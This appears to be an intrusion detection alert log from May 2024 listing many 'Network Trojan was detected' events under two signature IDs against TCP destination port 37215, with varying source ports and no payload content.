                Timestamp:05/29/24-15:16:20.834669
                SID:2829579
                Source Port:41454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900623
                SID:2835222
                Source Port:33326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134685
                SID:2835222
                Source Port:38050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783885
                SID:2829579
                Source Port:33404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570629
                SID:2835222
                Source Port:35002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464619
                SID:2829579
                Source Port:40202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287968
                SID:2835222
                Source Port:52086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287942
                SID:2829579
                Source Port:34366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163931
                SID:2835222
                Source Port:45990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655166
                SID:2835222
                Source Port:43524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730302
                SID:2829579
                Source Port:34568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210739
                SID:2829579
                Source Port:59184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626983
                SID:2829579
                Source Port:46878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681737
                SID:2829579
                Source Port:57338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281964
                SID:2835222
                Source Port:57348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420508
                SID:2829579
                Source Port:48512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523988
                SID:2835222
                Source Port:49846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464018
                SID:2835222
                Source Port:42724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504154
                SID:2835222
                Source Port:36466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075085
                SID:2835222
                Source Port:57546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655247
                SID:2829579
                Source Port:43884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522812
                SID:2829579
                Source Port:58928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231119
                SID:2829579
                Source Port:48876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985660
                SID:2835222
                Source Port:37450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854454
                SID:2835222
                Source Port:53588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576071
                SID:2835222
                Source Port:41032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711743
                SID:2829579
                Source Port:37808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207355
                SID:2835222
                Source Port:41214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415950
                SID:2835222
                Source Port:54768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787576
                SID:2835222
                Source Port:60938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362616
                SID:2829579
                Source Port:49014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732427
                SID:2835222
                Source Port:34946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070286
                SID:2835222
                Source Port:58712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218027
                SID:2835222
                Source Port:50060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039986
                SID:2829579
                Source Port:50800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182749
                SID:2829579
                Source Port:33458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498432
                SID:2829579
                Source Port:40462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947703
                SID:2829579
                Source Port:44308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380458
                SID:2835222
                Source Port:42064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903438
                SID:2829579
                Source Port:50276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652581
                SID:2829579
                Source Port:37404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666808
                SID:2829579
                Source Port:57388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713930
                SID:2835222
                Source Port:44150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667821
                SID:2835222
                Source Port:57004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285596
                SID:2829579
                Source Port:53938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945143
                SID:2835222
                Source Port:60668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363541
                SID:2835222
                Source Port:55794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960551
                SID:2829579
                Source Port:41438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981540
                SID:2835222
                Source Port:54552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140349
                SID:2829579
                Source Port:54172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168772
                SID:2829579
                Source Port:56008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.561967
                SID:2829579
                Source Port:47136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711131
                SID:2835222
                Source Port:52432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840813
                SID:2829579
                Source Port:60884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849509
                SID:2835222
                Source Port:46366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811574
                SID:2829579
                Source Port:45952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593472
                SID:2829579
                Source Port:50628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228103
                SID:2829579
                Source Port:46222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560953
                SID:2829579
                Source Port:48804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281231
                SID:2829579
                Source Port:56244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948268
                SID:2829579
                Source Port:44828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986745
                SID:2835222
                Source Port:38256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320416
                SID:2835222
                Source Port:59554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614069
                SID:2835222
                Source Port:53066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593578
                SID:2835222
                Source Port:38440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794409
                SID:2829579
                Source Port:44646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042741
                SID:2835222
                Source Port:50066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521787
                SID:2829579
                Source Port:53056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899306
                SID:2835222
                Source Port:47592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277519
                SID:2835222
                Source Port:60370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474697
                SID:2829579
                Source Port:51488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912664
                SID:2829579
                Source Port:50060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945200
                SID:2835222
                Source Port:36404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533832
                SID:2829579
                Source Port:43092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868507
                SID:2829579
                Source Port:35074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.870492
                SID:2835222
                Source Port:38696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798500
                SID:2829579
                Source Port:35212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381659
                SID:2829579
                Source Port:39746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856991
                SID:2829579
                Source Port:51180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431230
                SID:2829579
                Source Port:53054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653540
                SID:2829579
                Source Port:34672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843786
                SID:2829579
                Source Port:59832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072271
                SID:2829579
                Source Port:53956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558650
                SID:2835222
                Source Port:44754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717152
                SID:2835222
                Source Port:55184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965574
                SID:2835222
                Source Port:53006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321266
                SID:2835222
                Source Port:49362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166916
                SID:2829579
                Source Port:56722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799711
                SID:2835222
                Source Port:59396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567447
                SID:2835222
                Source Port:44394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903727
                SID:2829579
                Source Port:43460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209722
                SID:2835222
                Source Port:60930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.869545
                SID:2835222
                Source Port:38050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364732
                SID:2835222
                Source Port:60682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574245
                SID:2829579
                Source Port:34376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908087
                SID:2829579
                Source Port:58726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042890
                SID:2829579
                Source Port:33006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066790
                SID:2835222
                Source Port:60690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015697
                SID:2829579
                Source Port:39828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943986
                SID:2835222
                Source Port:50636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560816
                SID:2835222
                Source Port:38948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665458
                SID:2829579
                Source Port:35290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173263
                SID:2835222
                Source Port:42556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178751
                SID:2829579
                Source Port:56224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968282
                SID:2829579
                Source Port:48458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652192
                SID:2829579
                Source Port:41424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282214
                SID:2835222
                Source Port:54258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977218
                SID:2829579
                Source Port:49498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534787
                SID:2835222
                Source Port:39346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.043290
                SID:2835222
                Source Port:33172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629053
                SID:2829579
                Source Port:60600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667819
                SID:2829579
                Source Port:46408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794314
                SID:2835222
                Source Port:39836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333756
                SID:2829579
                Source Port:52242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558077
                SID:2835222
                Source Port:39676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559000
                SID:2829579
                Source Port:58932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025354
                SID:2829579
                Source Port:45782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269775
                SID:2829579
                Source Port:59902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873481
                SID:2829579
                Source Port:58564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038498
                SID:2835222
                Source Port:36422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071543
                SID:2835222
                Source Port:33922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434408
                SID:2829579
                Source Port:60460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968503
                SID:2829579
                Source Port:48086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799765
                SID:2835222
                Source Port:39080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422131
                SID:2835222
                Source Port:45158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550649
                SID:2835222
                Source Port:45934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618047
                SID:2829579
                Source Port:39524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588162
                SID:2829579
                Source Port:53946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.572049
                SID:2829579
                Source Port:51302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855810
                SID:2829579
                Source Port:36408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871860
                SID:2829579
                Source Port:36264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.589971
                SID:2829579
                Source Port:45120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.660378
                SID:2835222
                Source Port:50448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087283
                SID:2829579
                Source Port:60038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916138
                SID:2829579
                Source Port:52450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877872
                SID:2829579
                Source Port:47510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884121
                SID:2829579
                Source Port:52336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853229
                SID:2829579
                Source Port:41996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773299
                SID:2829579
                Source Port:36562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559099
                SID:2829579
                Source Port:36670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874831
                SID:2829579
                Source Port:52558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374556
                SID:2829579
                Source Port:43908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967607
                SID:2835222
                Source Port:43706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968400
                SID:2829579
                Source Port:37482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948542
                SID:2829579
                Source Port:60536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572095
                SID:2829579
                Source Port:57856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840238
                SID:2835222
                Source Port:38746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420929
                SID:2835222
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.935027
                SID:2829579
                Source Port:53948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282912
                SID:2835222
                Source Port:53292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.732844
                SID:2835222
                Source Port:56256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630361
                SID:2835222
                Source Port:60600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868305
                SID:2829579
                Source Port:55468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287832
                SID:2835222
                Source Port:58046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036980
                SID:2835222
                Source Port:39796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419196
                SID:2835222
                Source Port:40746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776525
                SID:2829579
                Source Port:48108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498920
                SID:2835222
                Source Port:55378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742190
                SID:2835222
                Source Port:60712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155021
                SID:2835222
                Source Port:47484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716270
                SID:2829579
                Source Port:49078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586703
                SID:2829579
                Source Port:60828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173904
                SID:2829579
                Source Port:39296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283772
                SID:2829579
                Source Port:46408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060833
                SID:2829579
                Source Port:52054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870471
                SID:2835222
                Source Port:34540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369664
                SID:2835222
                Source Port:37064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359705
                SID:2835222
                Source Port:41584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321627
                SID:2829579
                Source Port:47746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984224
                SID:2835222
                Source Port:58700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318758
                SID:2829579
                Source Port:33382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798104
                SID:2829579
                Source Port:40416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013471
                SID:2835222
                Source Port:58586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896165
                SID:2835222
                Source Port:36008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987334
                SID:2829579
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779439
                SID:2835222
                Source Port:35162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362432
                SID:2835222
                Source Port:55420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958168
                SID:2829579
                Source Port:57232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654844
                SID:2835222
                Source Port:49300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950172
                SID:2835222
                Source Port:55480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.018764
                SID:2829579
                Source Port:55148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227552
                SID:2829579
                Source Port:51348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842358
                SID:2829579
                Source Port:54618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329319
                SID:2835222
                Source Port:47104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655751
                SID:2829579
                Source Port:58012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994546
                SID:2829579
                Source Port:37744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587462
                SID:2835222
                Source Port:49980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.648490
                SID:2835222
                Source Port:36038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269054
                SID:2835222
                Source Port:57982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628294
                SID:2835222
                Source Port:36698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499443
                SID:2829579
                Source Port:38874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358757
                SID:2835222
                Source Port:53110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.226701
                SID:2829579
                Source Port:59806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227768
                SID:2835222
                Source Port:53006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899285
                SID:2835222
                Source Port:41188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438113
                SID:2835222
                Source Port:45676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418684
                SID:2835222
                Source Port:47730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900278
